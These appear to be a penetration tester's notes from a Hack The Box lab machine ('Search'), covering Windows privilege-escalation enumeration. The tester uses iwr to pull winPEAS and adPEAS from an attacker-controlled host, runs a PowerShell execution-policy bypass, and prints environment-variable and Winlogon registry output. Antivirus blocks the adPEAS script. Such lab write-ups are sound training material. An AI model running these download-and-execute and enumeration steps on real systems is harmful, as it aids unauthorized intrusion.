PEAS
ps c:\tmp> iwr -Uri http://10.10.14.7/winPEASx64.exe -Outfile C:\tmp\winPEASx64.exeDelivery complete
ps c:\tmp> .\winPEASx64.exe log
[1;32m"log" argument present, redirecting output to file "out.txt"[0m
doneDue to the PWSA not being able to parse the output properly, I will redirect the output to a file and read it from Kali
ENV
╔══════════╣ User Environment Variables
╚ Check for some passwords or keys in the env variables
COMPUTERNAME: RESEARCH
PUBLIC: C:\Users\Public
LOCALAPPDATA: C:\Users\Sierra.Frye\AppData\Local
PSModulePath: C:\Users\Sierra.Frye\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
PROCESSOR_ARCHITECTURE: AMD64
Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\Sierra.Frye\AppData\Local\Microsoft\WindowsApps
CommonProgramFiles(x86): C:\Program Files (x86)\Common Files
ProgramFiles(x86): C:\Program Files (x86)
PROCESSOR_LEVEL: 23
ProgramFiles: C:\Program Files
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL
USERPROFILE: C:\Users\Sierra.Frye
SystemRoot: C:\Windows
ALLUSERSPROFILE: C:\ProgramData
DriverData: C:\Windows\System32\Drivers\DriverData
ProgramData: C:\ProgramData
PROCESSOR_REVISION: 3100
USERNAME: Sierra.Frye
CommonProgramW6432: C:\Program Files\Common Files
CommonProgramFiles: C:\Program Files\Common Files
OS: Windows_NT
PROCESSOR_IDENTIFIER: AMD64 Family 23 Model 49 Stepping 0, AuthenticAMD
ComSpec: C:\Windows\system32\cmd.exe
SystemDrive: C:
TEMP: C:\Users\SIERRA~1.FRY\AppData\Local\Temp
NUMBER_OF_PROCESSORS: 2
APPDATA: C:\Users\Sierra.Frye\AppData\Roaming
TMP: C:\Users\SIERRA~1.FRY\AppData\Local\Temp
ProgramW6432: C:\Program Files
windir: C:\Windows
USERDOMAIN: SEARCH
USERDNSDOMAIN: SEARCH.HTB
╔══════════╣ System Environment Variables
╚ Check for some passwords or keys in the env variables
ComSpec: C:\Windows\system32\cmd.exe
DriverData: C:\Windows\System32\Drivers\DriverData
OS: Windows_NT
Path: C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\
PATHEXT: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTURE: AMD64
PSModulePath: C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
TEMP: C:\Windows\TEMP
TMP: C:\Windows\TEMP
USERNAME: SYSTEM
windir: C:\Windows
NUMBER_OF_PROCESSORS: 2
PROCESSOR_LEVEL: 23
PROCESSOR_IDENTIFIER: AMD64 Family 23 Model 49 Stepping 0, AuthenticAMD
PROCESSOR_REVISION: 3100LAPS
LSA Protection
Credentials Guard
Cached Creds
AV
PEAS claims that there is no AV despite that the adPEAS.ps1 script has been blocked by AV
UAC
PowerShell
PowerShell 5.1.17763.1
KrbRelayUp
NTLM
Defender
User Privileges (sierra.frye)
User privileges of the sierra.frye user has already been enumerated
DA
The organization appears to plan on disable the administrator user.
AutoLogon
ps c:\tmp> cmd /c reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
DefaultDomainName REG_SZ SEARCH
DefaultUserName REG_SZ
DisableBackButton REG_DWORD 0x1
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ
LegalNoticeText REG_SZ
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
ShellCritical REG_DWORD 0x0
ShellInfrastructure REG_SZ sihost.exe
SiHostCritical REG_DWORD 0x0
SiHostReadyTimeOut REG_DWORD 0x0
SiHostRestartCountLimit REG_DWORD 0x0
SiHostRestartTimeGap REG_DWORD 0x0
userinit reg_sz c:\Windows\system32\userinit.exe,
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
WinStationsDisabled REG_SZ 0
scremoveoption REG_SZ 0
DisableCAD REG_DWORD 0x1
LastLogOffEndTimePerfCounter REG_QWORD 0x2e7e54ca7
ShutdownFlags REG_DWORD 0x13
DisableLockWorkstation REG_DWORD 0x0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AlternateShells
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\UserDefaults
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AutoLogonChecked
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\VolatileUserMgrKeyadPEAS
PS C:\tmp> iwr -Uri http://10.10.14.7/adPEAS.ps1 -Outfile C:\tmp\adPEAS.ps1
PS C:\tmp> powershell -ep bypass -nop -c "Import-Module C:\tmp\adPEAS.ps1 ; Invoke-adPEAS > C:\tmp\adPEAS_output.txt"
powershell : At C:\tmp\adPEAS.ps1:1 char:1
+ CategoryInfo : NotSpecified: (At C:\tmp\adPEAS.ps1:1 char:1:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
+ Function Invoke-adPEAS {
+ ~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent
Invoke-adPEAS : The term 'Invoke-adPEAS' is not recognized as the name of a cmdlet, function,
script file, or operable program. Check the spelling of the name, or if a path was included,
verify that the path is correct and try again.
At line:1 char:35
+ Import-Module C:\tmp\adPEAS.ps1 ; Invoke-adPEAS > C:\tmp\adPEAS_outpu ...
+ ~~~~~~~~~~~~~
+ CategoryInfo : ObjectNotFound: (Invoke-adPEAS:String) [], CommandNotFoundException
+ FullyQualifiedErrorId : CommandNotFoundException